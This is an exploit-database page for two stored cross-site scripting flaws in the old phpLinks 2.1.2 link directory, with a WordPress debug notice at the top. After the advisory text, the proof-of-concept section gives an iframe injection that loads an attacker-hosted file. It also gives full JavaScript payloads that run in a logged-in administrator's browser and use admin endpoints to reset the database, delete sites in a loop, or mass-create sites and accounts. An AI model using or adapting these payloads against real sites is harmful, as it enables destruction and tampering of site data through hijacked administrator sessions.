Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
phpLinks Multiple Vulnerabilities - exploit.company
header-logo
Suggest Exploit
vendor:
phpLinks
by:
James Bercegay
7.5
CVSS
HIGH
Search Script Injection Vulnerability, Add Site Script Injection Vulnerability
79
CWE
Product Name: phpLinks
Affected Version From: <= 2.1.2
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: a:destiney.com:phplinks
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2005

phpLinks Multiple Vulnerabilities

phpLinks is prone to HTML injection due to a vulnerability in the search feature. Search queries are not sufficiently sanitized of HTML and script code. These search queries may potentially be displayed to other users when the most popular searches are viewed. If an attacker includes malicious HTML or script code in these queries, it is possible that the attacker-supplied code may be rendered in the web client software of other users. phpLinks does not sufficiently sanitized HTML and script code supplied via form fields before displaying this data to administrative users. This issue exists in the 'add.php' script, which is used to add sites to the phpLinks system. As a result, an attacker may cause malicious HTML and script code to be executed in the web client of an administrative user who reviews attacker-supplied data submitted when a site is added.

Mitigation:

Upgrade to the latest version of phpLinks
Source

Exploit-DB raw data:

phpLinks Multiple Vulnerabilities

Vendor: destiney.com
Product: phpLinks
Version: <= 2.1.2
Website: http://phplinks.sourceforge.net/

BID: 6632 6633 

Description:
phpLinks is an open source free PHP script. phpLinks allows you to run a very powerful link farm or search engine. phpLinks has multilevel site categorization, infinite threaded search capabilities and more. 

Search Script Injection Vulnerability:
phpLinks is prone to HTML injection due to a vulnerability in the search feature. Search queries are not sufficiently sanitized of HTML and script code. These search queries may potentially be displayed to other users when the most popular searches are viewed. If an attacker includes malicious HTML or script code in these queries, it is possible that the attacker-supplied code may be rendered in the web client software of other users. 

Add Site Script Injection Vulnerability:
phpLinks does not sufficiently sanitized HTML and script code supplied via form fields before displaying this data to administrative users. This issue exists in the 'add.php' script, which is used to add sites to the phpLinks system. As a result, an attacker may cause malicious HTML and script code to be executed in the web client of an administrative user who reviews attacker-supplied data submitted when a site is added. 

Solution:
https://www.securityfocus.com/bid/6632/solution/
https://www.securityfocus.com/bid/6633/solution/ 

Proof Of Conecpt Exploit:
phpLinks Arbitrary Command Proof Of Concept 

Credits:
James Bercegay of the GulfTech Security Research Team.




- https://www.securityfocus.com/bid/6632/info
Put this in one of the field on "Add Site" form located at
http://blah/phplinks/index.php?show=add&PID=
If you inject the code into the Site Title or Site Url field, the code
will be ran as soon as a logged in administrator views it.

<iframe src=http://blah/death.html></iframe>

Below is the code for the called file "death.html"

---------------------------------------------------------------------------
<script language=JavaScript>
var i = 10; // This is the number of the user ID to start deleting
var BaseURL = "http://victimsite/phplinks/";
window.open(BaseURL + '/admin/reset.php?
reset_in=&reset_out=&search_terms=&referrers=&submit='); // this resets
the database
function Waste()
{
while (i) {
i++;
window.open(BaseURL + 'admin/delete_site.php?dbtable=links&ID=' + i
+ '&sure=Yes');
}
}
</script>
<body onLoad="Waste();">
---------------------------------------------------------------------------

As you can see, that code (when called by a logged in admin validating
sites) is run, the database is in alot of cases going to be left empty. By
the way, the dbtable=links can be changed to dbtable=temp in order to
affect sites not yet approved etc. On the other hand you can add users to
the database and more. Take the following code for example:

<iframe src=http://blah/life.html></iframe>

Below is the code for the called file "life.html":

---------------------------------------------------------------------------
<script language=JavaScript>
var i = 1;
var BaseURL = "http://victimsite/phplinks/";
function Gluttony()
{
while (i) {
i++;
window.open(BaseURL + '/admin/add_site.php?SiteName=JeiAr0wnethTheee' + i
+ '&SiteURL=http://www.b' + i + 'j.orfd&Description=' + i
+'3333333333333333333333333333333333&Category=&Country=Turkey.gif&Email=1@t
.' + i + '&UserName=12345' + i
+ '&Password=12345678&Hint=12345678910&add=' + i + '&sure=Yes');
}
}
</script>
<body onLoad="Gluttony();">
---------------------------------------------------------------------------



- https://www.securityfocus.com/bid/6633/info

Navigation

Suggest Exploit

Services By CQR